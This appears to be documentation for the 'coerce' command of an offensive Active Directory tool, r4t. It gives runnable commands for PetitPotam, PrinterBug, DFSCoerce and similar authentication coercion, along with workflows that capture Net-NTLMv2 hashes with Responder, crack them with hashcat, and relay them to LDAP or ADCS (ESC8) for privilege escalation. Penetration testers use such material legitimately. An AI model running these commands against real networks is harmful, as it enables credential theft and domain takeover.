coerce

The coerce command performs authentication coercion attacks — forcing a remote machine to authenticate back to an attacker-controlled listener using various Windows RPC protocols. This is used to capture Net-NTLMv2 hashes or relay authentication to other services (e.g., LDAP, SMB, ADCS web enrollment).

Usage

r4t coerce <method> [target] [flags]

Common Flags

These flags are shared across all coercion methods:

Flag	Short	Description
`--listener`	`-L`	Attacker listener IP or hostname (required)
`--username`	`-u`	Username for RPC authentication to target
`--password`	`-p`	Password for RPC authentication
`--hash`	`-H`	NT hash (`LM:NT` or just `NT`)
`--domain`	`-d`	Domain
`--dc`	—	Domain controller (optional; used for Kerberos ticket resolution)
`--target-ip`	—	Override target IP (SNI still uses the hostname)
`--incremental`	`-i`	Prompt before each named pipe attempt (default: `true`)
`--threads`	`-t`	Number of concurrent coercion threads (default: 1)

Relay Flags

When --relay <host> is set, R4t starts a built-in relay server alongside the coercion attack and forwards captured authentication to the specified target. These flags are available on every method subcommand.

Flag	Description
`--relay <host>`	Relay target host — enables the built-in relay server
`--adcs`	Relay type: SMB→HTTP(S) to Certificate Authority (ESC8) (default when no type is set)
`--smb`	Relay type: SMB→SMB (not yet implemented)
`--ldap`	Relay type: SMB→LDAP (not yet implemented)
`--ldaps`	Relay type: SMB→LDAPS (not yet implemented)
`--shadow-credentials`	Relay type: Shadow Credentials via LDAP (not yet implemented)
`--mssql`	Relay type: SMB→MSSQL (not yet implemented)

ADCS Relay Options

These flags apply when using --adcs (or when no relay type is specified, since ADCS is the default).

Flag	Description
`--template <name>`	Certificate template to request (required for ADCS relay)
`--https`	Use HTTPS when relaying to the CA (default: HTTP port 80)
`--relay-port <port>`	Override the port on the relay target (0 = protocol default)
`--ca-name <name>`	CA name — kept for CLI compatibility; ignored for certsrv web relay

Shadow Credentials Relay Options

Flag	Description
`--shadow-target <account>`	Account to inject shadow credentials into

Subcommands

`coerce petitpotam`

Coerce authentication via MS-EFSRPC (Encrypting File System Remote Protocol). This is the most widely applicable coercion method.

r4t coerce petitpotam --listener 10.10.10.100 dc01.corp.example.com

# With specific credentials for the RPC call
r4t coerce petitpotam --listener 10.10.10.100 \
  -u jsmith -p 'P@ssword1' -d corp.example.com \
  dc01.corp.example.com

R4t tries each of these named pipes in sequence:

lsarpc
efsr
samr
lsass
netlogon

Use --incremental (default) to prompt before each pipe, allowing you to stop if authentication is captured.

`coerce dfscoerce`

Coerce authentication via MS-DFSNM (Distributed File System Namespace Management Protocol).

r4t coerce dfscoerce --listener 10.10.10.100 dc01.corp.example.com

`coerce mseven`

Coerce authentication via MS-EVEN6 (Event Log Remoting Protocol Version 6).

r4t coerce mseven --listener 10.10.10.100 dc01.corp.example.com

`coerce shadowcoerce`

Coerce authentication via MS-FSRVP (File Server Remote VSS Protocol). Commonly referred to as ShadowCoerce.

r4t coerce shadowcoerce --listener 10.10.10.100 dc01.corp.example.com

`coerce printerbug`

Coerce authentication via MS-RPRN (Print System Remote Protocol). This is the original “PrinterBug” / SpoolSample method.

r4t coerce printerbug --listener 10.10.10.100 dc01.corp.example.com

`coerce interactive`

A split-panel interactive TUI that runs a listener on one side and coercion on the other simultaneously, giving real-time feedback on captured authentications.

r4t coerce interactive

TUI Controls

Key	Action
`Tab`	Switch between the listener panel and coercion panel
`Ctrl+K`	Kill the listener
`Ctrl+P`	Pause / resume the listener
`Ctrl+S`	Show / hide password
`q` / `Ctrl+C`	Quit

How Coercion Works

Authentication coercion exploits Windows RPC protocols that make outbound network calls using the machine account’s credentials. When you trigger one of these calls with a listener IP as the destination, the target machine authenticates to your listener.

Attacker (r4t coerce)          Target Machine             Attacker Listener
        │                            │                           │
        │── RPC Call (trigger) ──►   │                           │
        │                            │── NTLM Auth (Net-NTLM) ──►│
        │                            │                           │
                                               Captured!

The captured authentication can be:

Cracked offline (Net-NTLMv2 → password)
Relayed to another service (LDAP, SMB, ADCS web enrollment)

Common Coercion Workflows

Capture and Crack

# Start Responder (external) to capture Net-NTLMv2
sudo responder -I eth0 -w

# Coerce the target
r4t coerce petitpotam --listener 10.10.10.100 dc01.corp.example.com

# Crack captured hash with hashcat
hashcat -m 5600 captured.hash wordlist.txt

Relay to LDAP (Privilege Escalation via RBCD)

# Start ntlmrelayx targeting LDAP (external)
ntlmrelayx.py -t ldap://dc01.corp.example.com --delegate-access

# Coerce a server to authenticate
r4t coerce petitpotam --listener 10.10.10.100 server01.corp.example.com

Relay to ADCS Web Enrollment (ESC8)

R4t has a built-in relay for ADCS — no external ntlmrelayx needed. --template is required.

# Coerce and relay in one command — relay server starts automatically
r4t coerce petitpotam --listener 10.10.10.100 \
  --relay ca.corp.example.com --adcs --template Machine \
  server01.corp.example.com

# Use HTTPS if the CA only serves over 443
r4t coerce petitpotam --listener 10.10.10.100 \
  --relay ca.corp.example.com --adcs --template Machine --https \
  server01.corp.example.com

# Use resulting PFX to extract NT hash
r4t adcs nt --pfx /tmp/server01.pfx

Coercible Host Discovery

Before coercing, identify which hosts are susceptible:

# LDAP scan stores coercable hosts in the database
r4t ldap scan

# View results
r4t dbquery "SELECT * FROM coercables"

Coercible Hosts Database

Hosts identified as potentially coercible are stored in the coercables table:

Column	Description
Host	Hostname or IP
Method	Which RPC protocol is likely exploitable
Notes	Additional context

​coerce

​Usage

​Common Flags

​Relay Flags

​ADCS Relay Options

​Shadow Credentials Relay Options

​Subcommands

​coerce petitpotam

​coerce dfscoerce

​coerce mseven

​coerce shadowcoerce

​coerce printerbug

​coerce interactive

​TUI Controls

​How Coercion Works

​Common Coercion Workflows

​Capture and Crack

​Relay to LDAP (Privilege Escalation via RBCD)

​Relay to ADCS Web Enrollment (ESC8)

​Coercible Host Discovery

​Coercible Hosts Database